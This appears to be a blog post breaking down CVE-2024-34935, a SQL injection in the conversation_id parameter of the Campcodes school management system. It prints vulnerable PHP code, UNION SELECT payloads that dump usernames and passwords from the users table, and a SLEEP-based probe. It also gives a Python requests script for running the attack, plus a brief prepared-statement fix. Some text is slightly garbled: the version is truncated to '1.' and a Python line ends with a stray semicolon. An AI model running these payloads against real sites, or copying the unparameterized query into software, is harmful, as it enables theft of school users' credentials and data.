CVE-2024-34935 - SQL Injection in Campcodes Complete Web-Based School Management System 1. – Full Exploit Breakdown

A recent vulnerability has been identified in the Campcodes Complete Web-Based School Management System 1. that could allow an attacker to take full control of the system's backend database. Tracked as CVE-2024-34935, this security issue affects the conversation_id parameter in the /view/conversation_history_admin.php endpoint, leading to a classic and critical SQL Injection attack vector.

In this post, we’ll break down what this vulnerability means, how it can be exploited, and give you all the essential technical details with code snippets, so you’ll know how to check for it or defend against it.

What is SQL Injection?

SQL Injection is one of the most dangerous vulnerabilities in web applications. It happens when user-supplied data is unsafely included in database queries. Malicious users can manipulate queries to view, modify, or delete data they should not access—or sometimes, even gain command execution on the server.

Version: 1.

- Affected Script: /view/conversation_history_admin.php

How The Vulnerability Occurs

In the code, the conversation_id is fetched directly from GET input and embedded into an SQL statement without any sanitization or parameterization.

Example of (likely) vulnerable PHP code

// conversation_history_admin.php
// Pseudocode, based on typical vulnerable pattern

$conversation_id = $_GET['conversation_id'];

// Vulnerable query
$result = mysqli_query($conn, "SELECT * FROM conversation WHERE conversation_id = $conversation_id");

Here, if an attacker sends a crafted value for conversation_id, it will be executed as part of the SQL query.

Exploitation Example

Let’s say an attacker wants to dump all users from the users table. They can craft the following request:

GET /view/conversation_history_admin.php?conversation_id=1%20UNION%20SELECT%201,username,password,4,5%20FROM%20users--+

The URL Decoded looks like:

/view/conversation_history_admin.php?conversation_id=1 UNION SELECT 1,username,password,4,5 FROM users--+

- The SQL query becomes

  SELECT * FROM conversation WHERE conversation_id = 1 UNION SELECT 1,username,password,4,5 FROM users--+
  

Find the vulnerable parameter:

- Intercept the request to /view/conversation_history_admin.php?conversation_id=1

`

/view/conversation_history_admin.php?conversation_id=1 AND SLEEP(5)

`

/view/conversation_history_admin.php?conversation_id=1 UNION SELECT 1,username,password,4,5 FROM users--+

Here's a simple Python request to demonstrate the exploit

import requests

url = 'http://target-site/view/conversation_history_admin.php';
payload = "1 UNION SELECT 1,username,password,4,5 FROM users--+"
params = {'conversation_id': payload}

response = requests.get(url, params=params)
print(response.text)

References

- Campcodes original source page
- NVD CVE-2024-34935 (official record, check for updates)
- OWASP SQL Injection

Input validation: Always sanitize and validate any input coming from users.

- Use Prepared Statements: Parameterize SQL queries using PDO or mysqli prepared statements in PHP.

Example of Safe PHP Code

$conversation_id = $_GET['conversation_id'];
$stmt = $conn->prepare('SELECT * FROM conversation WHERE conversation_id = ?');
$stmt->bind_param('i', $conversation_id);
$stmt->execute();

Conclusion

CVE-2024-34935 is a high-impact SQL Injection bug in a popular open-source school management system. Anyone using Campcodes’ School Management System 1. should patch or secure their installation immediately.

If you run this software:

Update or patch your code to use prepared statements.

If you’re a researcher or sysadmin:

Stay safe and keep your apps secure!

*Written exclusively for you, sharing deep-dive insights and practical steps. Bookmark this post for reference!*

Timeline

Published on: 05/23/2024 17:15:30 UTC
Last modified on: 08/01/2024 13:52:27 UTC